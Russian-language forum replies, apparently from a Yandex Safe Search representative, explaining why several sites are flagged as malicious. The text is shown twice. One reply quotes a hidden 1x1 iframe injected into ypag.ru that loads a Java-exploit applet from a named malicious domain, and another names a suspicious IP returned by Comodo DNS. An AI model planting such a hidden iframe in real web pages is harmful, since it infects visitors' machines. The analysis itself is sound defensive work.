Всё верно. Например, на главной странице у него есть: document.write(«»); document.write(«»); которые дописывают на страницу теги , в которые подгружается вредоносный код. Эти строчки дописаны в тот же блок , который загружает и счётчик с tns-counter.ru , но никакого отношения к tns-counter.ru они не имеют. Как только Безопасный Поиск Яндекса обнаруживает вредоносный код, предупреждения начинают выдаваться на нашей поисковой выдаче, в Firefox c Яндекс.Баром и в Опере. Кроме того, мы почти сразу же, ещё 18.10.2011, написали rusrep.ru об этом вредоносном коде, но он до сих пор на этом сайте присутствует.
Это проблемы на стороне Comodo Secure DNS, который вместо ip-адресов yandex.ru возвращает 174.129.145.134 , с которого может распространяться разное. Подробности можно прочитать, например, [URL=http://safesearch.ya.ru/replies.xml?item_no=254]здесь[/URL] и [URL=http://webplanet.ru/news/security/2011/11/02/comodo_unsecure_dns.html]здесь[/URL]. Рекомендуем не пользоваться DNS-серверами компании Comodo до тех пор, пока они не устранят эту ошибку или последствия взлома.
Google совершенно правильно считает сайт ypag.ru заражённым. Потому что ypag.ru регулярно начинает распространять вредоносное ПО, потом перестаёт, потом опять начинает. Позавчера, например, в опять начал, а сегодня перестал. В общих чертах, вредоносный код с ypag.ru работает так. В браузер, например, со страницы h**p://www.ypag.ru/cat/komp550/page0.html загружается IFRAME src=»h**p://b4ss.in/stat/show.php?key=fcfe7c&u=root» frameBorder=0 width=1 height=1></IFRAME Он подгружает c b4ss.in апплет, эксплуатирующий уязвимости Java, и заражающий систему. На самом деле, не обязательно c b4ss.in, просто с домена [буква][цифра]ss.in . Недавно, например, в качестве источника использовался домен b3ss.in. Так что не на антивирус Google ругаться надо, Сергей Денисович, а вредоносный код с ypag.ru удалить и больше туда не допускать. Что же до антивирусов, то любой антивирус время от времени ошибается, особенно когда нужно выявить drive-by-download атаку с сайта. Лучше дополнять его браузером, который умеет предупреждать о заражённых сайтах через SB API. Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще.
Дискуссии пользователя
Всё верно. Например, на главной странице у него есть: document.write(«»); document.write(«»); которые дописывают на страницу теги , в которые подгружается вредоносный код. Эти строчки дописаны в тот же блок , который загружает и счётчик с tns-counter.ru , но никакого отношения к tns-counter.ru они не имеют. Как только Безопасный Поиск Яндекса обнаруживает вредоносный код, предупреждения начинают выдаваться на нашей поисковой выдаче, в Firefox c Яндекс.Баром и в Опере. Кроме того, мы почти сразу же, ещё 18.10.2011, написали rusrep.ru об этом вредоносном коде, но он до сих пор на этом сайте присутствует.
Это проблемы на стороне Comodo Secure DNS, который вместо ip-адресов yandex.ru возвращает 174.129.145.134 , с которого может распространяться разное. Подробности можно прочитать, например, [URL=http://safesearch.ya.ru/replies.xml?item_no=254]здесь[/URL] и [URL=http://webplanet.ru/news/security/2011/11/02/comodo_unsecure_dns.html]здесь[/URL]. Рекомендуем не пользоваться DNS-серверами компании Comodo до тех пор, пока они не устранят эту ошибку или последствия взлома.
Google совершенно правильно считает сайт ypag.ru заражённым. Потому что ypag.ru регулярно начинает распространять вредоносное ПО, потом перестаёт, потом опять начинает. Позавчера, например, в опять начал, а сегодня перестал. В общих чертах, вредоносный код с ypag.ru работает так. В браузер, например, со страницы h**p://www.ypag.ru/cat/komp550/page0.html загружается IFRAME src=»h**p://b4ss.in/stat/show.php?key=fcfe7c&u=root» frameBorder=0 width=1 height=1></IFRAME Он подгружает c b4ss.in апплет, эксплуатирующий уязвимости Java, и заражающий систему. На самом деле, не обязательно c b4ss.in, просто с домена [буква][цифра]ss.in . Недавно, например, в качестве источника использовался домен b3ss.in. Так что не на антивирус Google ругаться надо, Сергей Денисович, а вредоносный код с ypag.ru удалить и больше туда не допускать. Что же до антивирусов, то любой антивирус время от времени ошибается, особенно когда нужно выявить drive-by-download атаку с сайта. Лучше дополнять его браузером, который умеет предупреждать о заражённых сайтах через SB API. Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще.